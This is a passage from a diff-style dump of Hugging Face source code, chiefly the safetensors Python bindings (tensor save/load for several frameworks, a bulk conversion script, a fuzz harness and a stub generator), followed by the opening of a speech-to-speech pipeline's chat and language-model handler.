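    python convert.py gpt2
    python convert.py facebook/wav2vec2-base-960h --revision main -y   # -y skips the unpickling safety prompt

Answering "y" at the prompt (or passing -y) downloads the PyTorch weights, converts them locally, and opens a PR on the Hub with the resulting safetensors files, as described in the script's own DESCRIPTION string.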
408
+ # File: safetensors-main/bindings/python/convert_all.py
409
+ """"""
410
+ from convert import AlreadyExists, convert
411
+ from huggingface_hub import HfApi, ModelFilter, ModelSearchArguments
412
+ from transformers import AutoConfig
413
+ if __name__ == '__main__':
414
+ api = HfApi()
415
+ args = ModelSearchArguments()
416
+ total = 50
417
+ models = list(api.list_models(filter=ModelFilter(library=args.library.Transformers), sort='downloads', direction=-1))[:total]
418
+ correct = 0
419
+ errors = set()
420
+ for model in models:
421
+ model = api.model_info(model.id, files_metadata=True)
422
+ size = None
423
+ for sibling in model.siblings:
424
+ if sibling.rfilename == 'pytorch_model.bin':
425
+ size = sibling.size
426
+ if size is None or size > 2000000000:
427
+ print(f'[{model.downloads}] Skipping {model.modelId} (too large {size})')
428
+ continue
429
+ model_id = model.modelId
430
+ print(f'[{model.downloads}] {model.modelId}')
431
+ try:
432
+ convert(api, model_id)
433
+ correct += 1
434
+ except AlreadyExists as e:
435
+ correct += 1
436
+ print(e)
437
+ except Exception as e:
438
+ config = AutoConfig.from_pretrained(model_id)
439
+ errors.add(config.__class__.__name__)
440
+ print(e)
441
+ print(f'Errors: {errors}')
442
+ print(f'File size is difference {len(errors)}')
443
+ print(f'Correct rate {correct}/{total} ({correct / total * 100:.2f}%)')
444
+
445
+ # File: safetensors-main/bindings/python/fuzz.py
446
+ import datetime
447
+ import sys
448
+ import tempfile
449
+ from collections import defaultdict
450
+ import atheris
451
+ with atheris.instrument_imports():
452
+ from safetensors.torch import load_file
453
+ EXCEPTIONS = defaultdict(int)
454
+ START = datetime.datetime.now()
455
+ DT = datetime.timedelta(seconds=30)
456
+
457
+ def TestOneInput(data):
458
+ global START
459
+ with tempfile.NamedTemporaryFile() as f:
460
+ f.write(data)
461
+ f.seek(0)
462
+ try:
463
+ load_file(f.name, device=0)
464
+ except Exception as e:
465
+ EXCEPTIONS[str(e)] += 1
466
+ if datetime.datetime.now() - START > DT:
467
+ for (e, n) in EXCEPTIONS.items():
468
+ print(e, n)
469
+ START = datetime.datetime.now()
470
+ atheris.Setup(sys.argv, TestOneInput)
471
+ atheris.Fuzz()
472
+
473
+ # File: safetensors-main/bindings/python/py_src/safetensors/flax.py
474
+ import os
475
+ from typing import Dict, Optional, Union
476
+ import numpy as np
477
+ import jax.numpy as jnp
478
+ from jax import Array
479
+ from safetensors import numpy, safe_open
480
+
481
+ def save(tensors: Dict[str, Array], metadata: Optional[Dict[str, str]]=None) -> bytes:
482
+ np_tensors = _jnp2np(tensors)
483
+ return numpy.save(np_tensors, metadata=metadata)
484
+
485
+ def save_file(tensors: Dict[str, Array], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]]=None) -> None:
486
+ np_tensors = _jnp2np(tensors)
487
+ return numpy.save_file(np_tensors, filename, metadata=metadata)
488
+
489
+ def load(data: bytes) -> Dict[str, Array]:
490
+ flat = numpy.load(data)
491
+ return _np2jnp(flat)
492
+
493
+ def load_file(filename: Union[str, os.PathLike]) -> Dict[str, Array]:
494
+ result = {}
495
+ with safe_open(filename, framework='flax') as f:
496
+ for k in f.keys():
497
+ result[k] = f.get_tensor(k)
498
+ return result
499
+
500
+ def _np2jnp(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, Array]:
501
+ for (k, v) in numpy_dict.items():
502
+ numpy_dict[k] = jnp.array(v)
503
+ return numpy_dict
504
+
505
+ def _jnp2np(jnp_dict: Dict[str, Array]) -> Dict[str, np.array]:
506
+ for (k, v) in jnp_dict.items():
507
+ jnp_dict[k] = np.asarray(v)
508
+ return jnp_dict
509
+
510
+ # File: safetensors-main/bindings/python/py_src/safetensors/mlx.py
511
+ import os
512
+ from typing import Dict, Optional, Union
513
+ import numpy as np
514
+ import mlx.core as mx
515
+ from safetensors import numpy, safe_open
516
+
517
+ def save(tensors: Dict[str, mx.array], metadata: Optional[Dict[str, str]]=None) -> bytes:
518
+ np_tensors = _mx2np(tensors)
519
+ return numpy.save(np_tensors, metadata=metadata)
520
+
521
+ def save_file(tensors: Dict[str, mx.array], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]]=None) -> None:
522
+ np_tensors = _mx2np(tensors)
523
+ return numpy.save_file(np_tensors, filename, metadata=metadata)
524
+
525
+ def load(data: bytes) -> Dict[str, mx.array]:
526
+ flat = numpy.load(data)
527
+ return _np2mx(flat)
528
+
529
+ def load_file(filename: Union[str, os.PathLike]) -> Dict[str, mx.array]:
530
+ result = {}
531
+ with safe_open(filename, framework='mlx') as f:
532
+ for k in f.keys():
533
+ result[k] = f.get_tensor(k)
534
+ return result
535
+
536
+ def _np2mx(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, mx.array]:
537
+ for (k, v) in numpy_dict.items():
538
+ numpy_dict[k] = mx.array(v)
539
+ return numpy_dict
540
+
541
+ def _mx2np(mx_dict: Dict[str, mx.array]) -> Dict[str, np.array]:
542
+ new_dict = {}
543
+ for (k, v) in mx_dict.items():
544
+ new_dict[k] = np.asarray(v)
545
+ return new_dict
546
+
547
+ # File: safetensors-main/bindings/python/py_src/safetensors/numpy.py
548
+ import os
549
+ import sys
550
+ from typing import Dict, Optional, Union
551
+ import numpy as np
552
+ from safetensors import deserialize, safe_open, serialize, serialize_file
553
+
554
+ def _tobytes(tensor: np.ndarray) -> bytes:
555
+ if not _is_little_endian(tensor):
556
+ tensor = tensor.byteswap(inplace=False)
557
+ return tensor.tobytes()
558
+
559
+ def save(tensor_dict: Dict[str, np.ndarray], metadata: Optional[Dict[str, str]]=None) -> bytes:
560
+ flattened = {k: {'dtype': v.dtype.name, 'shape': v.shape, 'data': _tobytes(v)} for (k, v) in tensor_dict.items()}
561
+ serialized = serialize(flattened, metadata=metadata)
562
+ result = bytes(serialized)
563
+ return result
564
+
565
+ def save_file(tensor_dict: Dict[str, np.ndarray], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]]=None) -> None:
566
+ flattened = {k: {'dtype': v.dtype.name, 'shape': v.shape, 'data': _tobytes(v)} for (k, v) in tensor_dict.items()}
567
+ serialize_file(flattened, filename, metadata=metadata)
568
+
569
+ def load(data: bytes) -> Dict[str, np.ndarray]:
570
+ flat = deserialize(data)
571
+ return _view2np(flat)
572
+
573
+ def load_file(filename: Union[str, os.PathLike]) -> Dict[str, np.ndarray]:
574
+ result = {}
575
+ with safe_open(filename, framework='np') as f:
576
+ for k in f.keys():
577
+ result[k] = f.get_tensor(k)
578
+ return result
579
+ _TYPES = {'F64': np.float64, 'F32': np.float32, 'F16': np.float16, 'I64': np.int64, 'U64': np.uint64, 'I32': np.int32, 'U32': np.uint32, 'I16': np.int16, 'U16': np.uint16, 'I8': np.int8, 'U8': np.uint8, 'BOOL': bool}
580
+
581
+ def _getdtype(dtype_str: str) -> np.dtype:
582
+ return _TYPES[dtype_str]
583
+
584
+ def _view2np(safeview) -> Dict[str, np.ndarray]:
585
+ result = {}
586
+ for (k, v) in safeview:
587
+ dtype = _getdtype(v['dtype'])
588
+ arr = np.frombuffer(v['data'], dtype=dtype).reshape(v['shape'])
589
+ result[k] = arr
590
+ return result
591
+
592
+ def _is_little_endian(tensor: np.ndarray) -> bool:
593
+ byteorder = tensor.dtype.byteorder
594
+ if byteorder == '=':
595
+ if sys.byteorder == 'little':
596
+ return True
597
+ else:
598
+ return False
599
+ elif byteorder == '|':
600
+ return True
601
+ elif byteorder == '<':
602
+ return True
603
+ elif byteorder == '>':
604
+ return False
605
+ raise ValueError(f'Unexpected byte order {byteorder}')
606
+
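A small usage sketch for the numpy module above; save returns raw bytes, and non-little-endian arrays are byteswapped before serialization:

    import numpy as np
    from safetensors.numpy import save, load

    arrays = {"weights": np.arange(6, dtype=np.float32).reshape(2, 3)}
    blob = save(arrays)          # header plus tensor buffer, as bytes
    restored = load(blob)        # np.ndarrays rebuilt with the same dtypes and shapes
    assert np.array_equal(restored["weights"], arrays["weights"])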
607
+ # File: safetensors-main/bindings/python/py_src/safetensors/paddle.py
608
+ import os
609
+ from typing import Dict, Optional, Union
610
+ import numpy as np
611
+ import paddle
612
+ from safetensors import numpy
613
+
614
+ def save(tensors: Dict[str, paddle.Tensor], metadata: Optional[Dict[str, str]]=None) -> bytes:
615
+ np_tensors = _paddle2np(tensors)
616
+ return numpy.save(np_tensors, metadata=metadata)
617
+
618
+ def save_file(tensors: Dict[str, paddle.Tensor], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]]=None) -> None:
619
+ np_tensors = _paddle2np(tensors)
620
+ return numpy.save_file(np_tensors, filename, metadata=metadata)
621
+
622
+ def load(data: bytes, device: str='cpu') -> Dict[str, paddle.Tensor]:
623
+ flat = numpy.load(data)
624
+ return _np2paddle(flat, device)
625
+
626
+ def load_file(filename: Union[str, os.PathLike], device='cpu') -> Dict[str, paddle.Tensor]:
627
+ flat = numpy.load_file(filename)
628
+ output = _np2paddle(flat, device)
629
+ return output
630
+
631
+ def _np2paddle(numpy_dict: Dict[str, np.ndarray], device: str='cpu') -> Dict[str, paddle.Tensor]:
632
+ for (k, v) in numpy_dict.items():
633
+ numpy_dict[k] = paddle.to_tensor(v, place=device)
634
+ return numpy_dict
635
+
636
+ def _paddle2np(paddle_dict: Dict[str, paddle.Tensor]) -> Dict[str, np.array]:
637
+ for (k, v) in paddle_dict.items():
638
+ paddle_dict[k] = v.detach().cpu().numpy()
639
+ return paddle_dict
640
+
641
+ # File: safetensors-main/bindings/python/py_src/safetensors/tensorflow.py
642
+ import os
643
+ from typing import Dict, Optional, Union
644
+ import numpy as np
645
+ import tensorflow as tf
646
+ from safetensors import numpy, safe_open
647
+
648
+ def save(tensors: Dict[str, tf.Tensor], metadata: Optional[Dict[str, str]]=None) -> bytes:
649
+ np_tensors = _tf2np(tensors)
650
+ return numpy.save(np_tensors, metadata=metadata)
651
+
652
+ def save_file(tensors: Dict[str, tf.Tensor], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]]=None) -> None:
653
+ np_tensors = _tf2np(tensors)
654
+ return numpy.save_file(np_tensors, filename, metadata=metadata)
655
+
656
+ def load(data: bytes) -> Dict[str, tf.Tensor]:
657
+ flat = numpy.load(data)
658
+ return _np2tf(flat)
659
+
660
+ def load_file(filename: Union[str, os.PathLike]) -> Dict[str, tf.Tensor]:
661
+ result = {}
662
+ with safe_open(filename, framework='tf') as f:
663
+ for k in f.keys():
664
+ result[k] = f.get_tensor(k)
665
+ return result
666
+
667
+ def _np2tf(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, tf.Tensor]:
668
+ for (k, v) in numpy_dict.items():
669
+ numpy_dict[k] = tf.convert_to_tensor(v)
670
+ return numpy_dict
671
+
672
+ def _tf2np(tf_dict: Dict[str, tf.Tensor]) -> Dict[str, np.array]:
673
+ for (k, v) in tf_dict.items():
674
+ tf_dict[k] = v.numpy()
675
+ return tf_dict
676
+
677
+ # File: safetensors-main/bindings/python/py_src/safetensors/torch.py
678
+ import os
679
+ import sys
680
+ from collections import defaultdict
681
+ from typing import Any, Dict, List, Optional, Set, Tuple, Union
682
+ import torch
683
+ from safetensors import deserialize, safe_open, serialize, serialize_file
684
+
685
+ def storage_ptr(tensor: torch.Tensor) -> int:
686
+ try:
687
+ return tensor.untyped_storage().data_ptr()
688
+ except Exception:
689
+ try:
690
+ return tensor.storage().data_ptr()
691
+ except NotImplementedError:
692
+ return 0
693
+
694
+ def _end_ptr(tensor: torch.Tensor) -> int:
695
+ if tensor.nelement():
696
+ stop = tensor.view(-1)[-1].data_ptr() + _SIZE[tensor.dtype]
697
+ else:
698
+ stop = tensor.data_ptr()
699
+ return stop
700
+
701
+ def storage_size(tensor: torch.Tensor) -> int:
702
+ try:
703
+ return tensor.untyped_storage().nbytes()
704
+ except AttributeError:
705
+ try:
706
+ return tensor.storage().size() * _SIZE[tensor.dtype]
707
+ except NotImplementedError:
708
+ return tensor.nelement() * _SIZE[tensor.dtype]
709
+
710
+ def _filter_shared_not_shared(tensors: List[Set[str]], state_dict: Dict[str, torch.Tensor]) -> List[Set[str]]:
711
+ filtered_tensors = []
712
+ for shared in tensors:
713
+ if len(shared) < 2:
714
+ filtered_tensors.append(shared)
715
+ continue
716
+ areas = []
717
+ for name in shared:
718
+ tensor = state_dict[name]
719
+ areas.append((tensor.data_ptr(), _end_ptr(tensor), name))
720
+ areas.sort()
721
+ (_, last_stop, last_name) = areas[0]
722
+ filtered_tensors.append({last_name})
723
+ for (start, stop, name) in areas[1:]:
724
+ if start >= last_stop:
725
+ filtered_tensors.append({name})
726
+ else:
727
+ filtered_tensors[-1].add(name)
728
+ last_stop = stop
729
+ return filtered_tensors
730
+
731
+ def _find_shared_tensors(state_dict: Dict[str, torch.Tensor]) -> List[Set[str]]:
732
+ tensors = defaultdict(set)
733
+ for (k, v) in state_dict.items():
734
+ if v.device != torch.device('meta') and storage_ptr(v) != 0 and (storage_size(v) != 0):
735
+ tensors[v.device, storage_ptr(v), storage_size(v)].add(k)
736
+ tensors = list(sorted(tensors.values()))
737
+ tensors = _filter_shared_not_shared(tensors, state_dict)
738
+ return tensors
739
+
740
+ def _is_complete(tensor: torch.Tensor) -> bool:
741
+ return tensor.data_ptr() == storage_ptr(tensor) and tensor.nelement() * _SIZE[tensor.dtype] == storage_size(tensor)
742
+
743
+ def _remove_duplicate_names(state_dict: Dict[str, torch.Tensor], *, preferred_names: Optional[List[str]]=None, discard_names: Optional[List[str]]=None) -> Dict[str, List[str]]:
744
+ if preferred_names is None:
745
+ preferred_names = []
746
+ preferred_names = set(preferred_names)
747
+ if discard_names is None:
748
+ discard_names = []
749
+ discard_names = set(discard_names)
750
+ shareds = _find_shared_tensors(state_dict)
751
+ to_remove = defaultdict(list)
752
+ for shared in shareds:
753
+ complete_names = set([name for name in shared if _is_complete(state_dict[name])])
754
+ if not complete_names:
755
+ raise RuntimeError(f'Error while trying to find names to remove to save state dict, but found no suitable name to keep for saving amongst: {shared}. None is covering the entire storage. Refusing to save/load the model since you could be storing much more memory than needed. Please refer to https://huggingface.co/docs/safetensors/torch_shared_tensors for more information. Or open an issue.')
756
+ keep_name = sorted(list(complete_names))[0]
757
+ preferred = complete_names.difference(discard_names)
758
+ if preferred:
759
+ keep_name = sorted(list(preferred))[0]
760
+ if preferred_names:
761
+ preferred = preferred_names.intersection(complete_names)
762
+ if preferred:
763
+ keep_name = sorted(list(preferred))[0]
764
+ for name in sorted(shared):
765
+ if name != keep_name:
766
+ to_remove[keep_name].append(name)
767
+ return to_remove
768
+
769
+ def save_model(model: torch.nn.Module, filename: str, metadata: Optional[Dict[str, str]]=None, force_contiguous: bool=True):
770
+ state_dict = model.state_dict()
771
+ to_removes = _remove_duplicate_names(state_dict)
772
+ for (kept_name, to_remove_group) in to_removes.items():
773
+ for to_remove in to_remove_group:
774
+ if metadata is None:
775
+ metadata = {}
776
+ if to_remove not in metadata:
777
+ metadata[to_remove] = kept_name
778
+ del state_dict[to_remove]
779
+ if force_contiguous:
780
+ state_dict = {k: v.contiguous() for (k, v) in state_dict.items()}
781
+ try:
782
+ save_file(state_dict, filename, metadata=metadata)
783
+ except ValueError as e:
784
+ msg = str(e)
785
+ msg += ' Or use save_model(..., force_contiguous=True), read the docs for potential caveats.'
786
+ raise ValueError(msg)
787
+
788
+ def load_model(model: torch.nn.Module, filename: Union[str, os.PathLike], strict: bool=True, device: Union[str, int]='cpu') -> Tuple[List[str], List[str]]:
789
+ state_dict = load_file(filename, device=device)
790
+ model_state_dict = model.state_dict()
791
+ to_removes = _remove_duplicate_names(model_state_dict, preferred_names=state_dict.keys())
792
+ (missing, unexpected) = model.load_state_dict(state_dict, strict=False)
793
+ missing = set(missing)
794
+ for to_remove_group in to_removes.values():
795
+ for to_remove in to_remove_group:
796
+ if to_remove not in missing:
797
+ unexpected.append(to_remove)
798
+ else:
799
+ missing.remove(to_remove)
800
+ if strict and (missing or unexpected):
801
+ missing_keys = ', '.join([f'"{k}"' for k in sorted(missing)])
802
+ unexpected_keys = ', '.join([f'"{k}"' for k in sorted(unexpected)])
803
+ error = f'Error(s) in loading state_dict for {model.__class__.__name__}:'
804
+ if missing:
805
+ error += f'\n Missing key(s) in state_dict: {missing_keys}'
806
+ if unexpected:
807
+ error += f'\n Unexpected key(s) in state_dict: {unexpected_keys}'
808
+ raise RuntimeError(error)
809
+ return (missing, unexpected)
810
+
811
+ def save(tensors: Dict[str, torch.Tensor], metadata: Optional[Dict[str, str]]=None) -> bytes:
812
+ serialized = serialize(_flatten(tensors), metadata=metadata)
813
+ result = bytes(serialized)
814
+ return result
815
+
816
+ def save_file(tensors: Dict[str, torch.Tensor], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]]=None):
817
+ serialize_file(_flatten(tensors), filename, metadata=metadata)
818
+
819
+ def load_file(filename: Union[str, os.PathLike], device: Union[str, int]='cpu') -> Dict[str, torch.Tensor]:
820
+ result = {}
821
+ with safe_open(filename, framework='pt', device=device) as f:
822
+ for k in f.keys():
823
+ result[k] = f.get_tensor(k)
824
+ return result
825
+
826
+ def load(data: bytes) -> Dict[str, torch.Tensor]:
827
+ flat = deserialize(data)
828
+ return _view2torch(flat)
829
+ _float8_e4m3fn = getattr(torch, 'float8_e4m3fn', None)
830
+ _float8_e5m2 = getattr(torch, 'float8_e5m2', None)
831
+ _SIZE = {torch.int64: 8, torch.float32: 4, torch.int32: 4, torch.bfloat16: 2, torch.float16: 2, torch.int16: 2, torch.uint8: 1, torch.int8: 1, torch.bool: 1, torch.float64: 8, _float8_e4m3fn: 1, _float8_e5m2: 1}
832
+ _TYPES = {'F64': torch.float64, 'F32': torch.float32, 'F16': torch.float16, 'BF16': torch.bfloat16, 'I64': torch.int64, 'I32': torch.int32, 'I16': torch.int16, 'I8': torch.int8, 'U8': torch.uint8, 'BOOL': torch.bool, 'F8_E4M3': _float8_e4m3fn, 'F8_E5M2': _float8_e5m2}
833
+
834
+ def _getdtype(dtype_str: str) -> torch.dtype:
835
+ return _TYPES[dtype_str]
836
+
837
+ def _view2torch(safeview) -> Dict[str, torch.Tensor]:
838
+ result = {}
839
+ for (k, v) in safeview:
840
+ dtype = _getdtype(v['dtype'])
841
+ if len(v['data']) == 0:
842
+ assert any((x == 0 for x in v['shape']))
843
+ arr = torch.empty(v['shape'], dtype=dtype)
844
+ else:
845
+ arr = torch.frombuffer(v['data'], dtype=dtype).reshape(v['shape'])
846
+ if sys.byteorder == 'big':
847
+ arr = torch.from_numpy(arr.numpy().byteswap(inplace=False))
848
+ result[k] = arr
849
+ return result
850
+
851
+ def _tobytes(tensor: torch.Tensor, name: str) -> bytes:
852
+ if tensor.layout != torch.strided:
853
+ raise ValueError(f'You are trying to save a sparse tensor: `{name}` which this library does not support. You can make it a dense tensor before saving with `.to_dense()` but be aware this might make a much larger file than needed.')
854
+ if not tensor.is_contiguous():
855
+ raise ValueError(f"You are trying to save a non contiguous tensor: `{name}` which is not allowed. It either means you are trying to save tensors which are reference of each other in which case it's recommended to save only the full tensors, and reslice at load time, or simply call `.contiguous()` on your tensor to pack it before saving.")
856
+ if tensor.device.type != 'cpu':
857
+ tensor = tensor.to('cpu')
858
+ import ctypes
859
+ import numpy as np
860
+ length = int(np.prod(tensor.shape).item())
861
+ bytes_per_item = _SIZE[tensor.dtype]
862
+ total_bytes = length * bytes_per_item
863
+ ptr = tensor.data_ptr()
864
+ if ptr == 0:
865
+ return b''
866
+ newptr = ctypes.cast(ptr, ctypes.POINTER(ctypes.c_ubyte))
867
+ data = np.ctypeslib.as_array(newptr, (total_bytes,))
868
+ if sys.byteorder == 'big':
869
+ NPDTYPES = {torch.int64: np.int64, torch.float32: np.float32, torch.int32: np.int32, torch.bfloat16: np.float16, torch.float16: np.float16, torch.int16: np.int16, torch.uint8: np.uint8, torch.int8: np.int8, torch.bool: bool, torch.float64: np.float64, _float8_e4m3fn: np.uint8, _float8_e5m2: np.uint8}
870
+ npdtype = NPDTYPES[tensor.dtype]
871
+ data = data.view(npdtype).byteswap(inplace=False)
872
+ return data.tobytes()
873
+
874
+ def _flatten(tensors: Dict[str, torch.Tensor]) -> Dict[str, Dict[str, Any]]:
875
+ if not isinstance(tensors, dict):
876
+ raise ValueError(f'Expected a dict of [str, torch.Tensor] but received {type(tensors)}')
877
+ invalid_tensors = []
878
+ for (k, v) in tensors.items():
879
+ if not isinstance(v, torch.Tensor):
880
+ raise ValueError(f'Key `{k}` is invalid, expected torch.Tensor but received {type(v)}')
881
+ if v.layout != torch.strided:
882
+ invalid_tensors.append(k)
883
+ if invalid_tensors:
884
+ raise ValueError(f'You are trying to save a sparse tensors: `{invalid_tensors}` which this library does not support. You can make it a dense tensor before saving with `.to_dense()` but be aware this might make a much larger file than needed.')
885
+ shared_pointers = _find_shared_tensors(tensors)
886
+ failing = []
887
+ for names in shared_pointers:
888
+ if len(names) > 1:
889
+ failing.append(names)
890
+ if failing:
891
+ raise RuntimeError(f'\n Some tensors share memory, this will lead to duplicate memory on disk and potential differences when loading them again: {failing}.\n A potential way to correctly save your model is to use `save_model`.\n More information at https://huggingface.co/docs/safetensors/torch_shared_tensors\n ')
892
+ return {k: {'dtype': str(v.dtype).split('.')[-1], 'shape': v.shape, 'data': _tobytes(v, k)} for (k, v) in tensors.items()}
893
+
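A minimal sketch of the torch helpers above: save_file/load_file handle plain tensor dicts, while save_model/load_model go through _remove_duplicate_names so tied or shared weights are deduplicated instead of rejected (file names are illustrative):

    import torch
    from safetensors.torch import save_file, load_file, save_model, load_model

    tensors = {"w": torch.zeros((2, 2)), "b": torch.zeros(2)}
    save_file(tensors, "weights.safetensors")
    restored = load_file("weights.safetensors")   # CPU tensors by default

    model = torch.nn.Linear(4, 4)
    save_model(model, "model.safetensors")        # drops duplicate names, records them in metadata
    missing, unexpected = load_model(model, "model.safetensors")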
894
+ # File: safetensors-main/bindings/python/stub.py
895
+ import argparse
896
+ import inspect
897
+ import os
898
+ import black
899
+ INDENT = ' ' * 4
900
+ GENERATED_COMMENT = '# Generated content DO NOT EDIT\n'
901
+
902
+ def do_indent(text: str, indent: str):
903
+ return text.replace('\n', f'\n{indent}')
904
+
905
+ def function(obj, indent, text_signature=None):
906
+ if text_signature is None:
907
+ text_signature = obj.__text_signature__
908
+ string = ''
909
+ string += f'{indent}def {obj.__name__}{text_signature}:\n'
910
+ indent += INDENT
911
+ string += f'{indent}"""\n'
912
+ string += f'{indent}{do_indent(obj.__doc__, indent)}\n'
913
+ string += f'{indent}"""\n'
914
+ string += f'{indent}pass\n'
915
+ string += '\n'
916
+ string += '\n'
917
+ return string
918
+
919
+ def member_sort(member):
920
+ if inspect.isclass(member):
921
+ value = 10 + len(inspect.getmro(member))
922
+ else:
923
+ value = 1
924
+ return value
925
+
926
+ def fn_predicate(obj):
927
+ value = inspect.ismethoddescriptor(obj) or inspect.isbuiltin(obj)
928
+ if value:
929
+ return obj.__doc__ and obj.__text_signature__ and (not obj.__name__.startswith('_'))
930
+ if inspect.isgetsetdescriptor(obj):
931
+ return obj.__doc__ and (not obj.__name__.startswith('_'))
932
+ return False
933
+
934
+ def get_module_members(module):
935
+ members = [member for (name, member) in inspect.getmembers(module) if not name.startswith('_') and (not inspect.ismodule(member))]
936
+ members.sort(key=member_sort)
937
+ return members
938
+
939
+ def pyi_file(obj, indent=''):
940
+ string = ''
941
+ if inspect.ismodule(obj):
942
+ string += GENERATED_COMMENT
943
+ members = get_module_members(obj)
944
+ for member in members:
945
+ string += pyi_file(member, indent)
946
+ elif inspect.isclass(obj):
947
+ indent += INDENT
948
+ mro = inspect.getmro(obj)
949
+ if len(mro) > 2:
950
+ inherit = f'({mro[1].__name__})'
951
+ else:
952
+ inherit = ''
953
+ string += f'class {obj.__name__}{inherit}:\n'
954
+ body = ''
955
+ if obj.__doc__:
956
+ body += f'{indent}"""\n{indent}{do_indent(obj.__doc__, indent)}\n{indent}"""\n'
957
+ fns = inspect.getmembers(obj, fn_predicate)
958
+ if obj.__text_signature__:
959
+ body += f'{indent}def __init__{obj.__text_signature__}:\n'
960
+ body += f'{indent + INDENT}pass\n'
961
+ body += '\n'
962
+ for (name, fn) in fns:
963
+ body += pyi_file(fn, indent=indent)
964
+ if not body:
965
+ body += f'{indent}pass\n'
966
+ string += body
967
+ string += '\n\n'
968
+ elif inspect.isbuiltin(obj):
969
+ string += f'{indent}@staticmethod\n'
970
+ string += function(obj, indent)
971
+ elif inspect.ismethoddescriptor(obj):
972
+ string += function(obj, indent)
973
+ elif inspect.isgetsetdescriptor(obj):
974
+ string += f'{indent}@property\n'
975
+ string += function(obj, indent, text_signature='(self)')
976
+ else:
977
+ raise Exception(f'Object {obj} is not supported')
978
+ return string
979
+
980
+ def py_file(module, origin):
981
+ members = get_module_members(module)
982
+ string = GENERATED_COMMENT
983
+ string += f'from .. import {origin}\n'
984
+ string += '\n'
985
+ for member in members:
986
+ name = member.__name__
987
+ string += f'{name} = {origin}.{name}\n'
988
+ return string
989
+
990
+ def do_black(content, is_pyi):
991
+ mode = black.Mode(target_versions={black.TargetVersion.PY35}, line_length=119, is_pyi=is_pyi, string_normalization=True, experimental_string_processing=False)
992
+ try:
993
+ return black.format_file_contents(content, fast=True, mode=mode)
994
+ except black.NothingChanged:
995
+ return content
996
+
997
+ def write(module, directory, origin, check=False):
998
+ submodules = [(name, member) for (name, member) in inspect.getmembers(module) if inspect.ismodule(member)]
999
+ filename = os.path.join(directory, '__init__.pyi')
1000
+ pyi_content = pyi_file(module)
1001
+ pyi_content = do_black(pyi_content, is_pyi=True)
1002
+ os.makedirs(directory, exist_ok=True)
1003
+ if check:
1004
+ with open(filename, 'r') as f:
1005
+ data = f.read()
1006
+ assert data == pyi_content, f'The content of {filename} seems outdated, please run `python stub.py`'
1007
+ else:
1008
+ with open(filename, 'w') as f:
1009
+ f.write(pyi_content)
1010
+ filename = os.path.join(directory, '__init__.py')
1011
+ py_content = py_file(module, origin)
1012
+ py_content = do_black(py_content, is_pyi=False)
1013
+ os.makedirs(directory, exist_ok=True)
1014
+ is_auto = False
1015
+ if not os.path.exists(filename):
1016
+ is_auto = True
1017
+ else:
1018
+ with open(filename, 'r') as f:
1019
+ line = f.readline()
1020
+ if line == GENERATED_COMMENT:
1021
+ is_auto = True
1022
+ if is_auto:
1023
+ if check:
1024
+ with open(filename, 'r') as f:
1025
+ data = f.read()
1026
+ assert data == py_content, f'The content of {filename} seems outdated, please run `python stub.py`'
1027
+ else:
1028
+ with open(filename, 'w') as f:
1029
+ f.write(py_content)
1030
+ for (name, submodule) in submodules:
1031
+ write(submodule, os.path.join(directory, name), f'{name}', check=check)
1032
+ if __name__ == '__main__':
1033
+ parser = argparse.ArgumentParser()
1034
+ parser.add_argument('--check', action='store_true')
1035
+ args = parser.parse_args()
1036
+ import safetensors
1037
+ write(safetensors.safetensors_rust, 'py_src/safetensors/', 'safetensors', check=args.check)
1038
+
huggingface_segment-anything-2.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_setfit.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_speech-to-speech.txt ADDED
@@ -0,0 +1,1208 @@
1
+ # File: speech-to-speech-main/LLM/chat.py
2
+ class Chat:
3
+
4
+ def __init__(self, size):
5
+ self.size = size
6
+ self.init_chat_message = None
7
+ self.buffer = []
8
+
9
+ def append(self, item):
10
+ self.buffer.append(item)
11
+ if len(self.buffer) == 2 * (self.size + 1):
12
+ self.buffer.pop(0)
13
+ self.buffer.pop(0)
14
+
15
+ def init_chat(self, init_chat_message):
16
+ self.init_chat_message = init_chat_message
17
+
18
+ def to_list(self):
19
+ if self.init_chat_message:
20
+ return [self.init_chat_message] + self.buffer
21
+ else:
22
+ return self.buffer
23
+
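A small illustration of the Chat buffer above: size caps the number of user/assistant exchanges kept, and the oldest pair is dropped once the cap is exceeded:

    chat = Chat(size=1)
    chat.init_chat({"role": "system", "content": "You are a helpful AI assistant."})
    chat.append({"role": "user", "content": "Hi"})
    chat.append({"role": "assistant", "content": "Hello!"})
    chat.append({"role": "user", "content": "How are you?"})
    chat.append({"role": "assistant", "content": "Fine."})  # triggers the trim, only the latest exchange is kept
    print(chat.to_list())  # system message followed by the most recent user/assistant pair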
24
+ # File: speech-to-speech-main/LLM/language_model.py
25
+ from threading import Thread
26
+ from transformers import AutoModelForCausalLM, AutoTokenizer, pipeline, TextIteratorStreamer
27
+ import torch
28
+ from LLM.chat import Chat
29
+ from baseHandler import BaseHandler
30
+ from rich.console import Console
31
+ import logging
32
+ from nltk import sent_tokenize
33
+ logger = logging.getLogger(__name__)
34
+ console = Console()
35
+ WHISPER_LANGUAGE_TO_LLM_LANGUAGE = {'en': 'english', 'fr': 'french', 'es': 'spanish', 'zh': 'chinese', 'ja': 'japanese', 'ko': 'korean'}
36
+
37
+ class LanguageModelHandler(BaseHandler):
38
+
39
+ def setup(self, model_name='microsoft/Phi-3-mini-4k-instruct', device='cuda', torch_dtype='float16', gen_kwargs={}, user_role='user', chat_size=1, init_chat_role=None, init_chat_prompt='You are a helpful AI assistant.'):
40
+ self.device = device
41
+ self.torch_dtype = getattr(torch, torch_dtype)
42
+ self.tokenizer = AutoTokenizer.from_pretrained(model_name)
43
+ self.model = AutoModelForCausalLM.from_pretrained(model_name, torch_dtype=torch_dtype, trust_remote_code=True).to(device)
44
+ self.pipe = pipeline('text-generation', model=self.model, tokenizer=self.tokenizer, device=device)
45
+ self.streamer = TextIteratorStreamer(self.tokenizer, skip_prompt=True, skip_special_tokens=True)
46
+ self.gen_kwargs = {'streamer': self.streamer, 'return_full_text': False, **gen_kwargs}
47
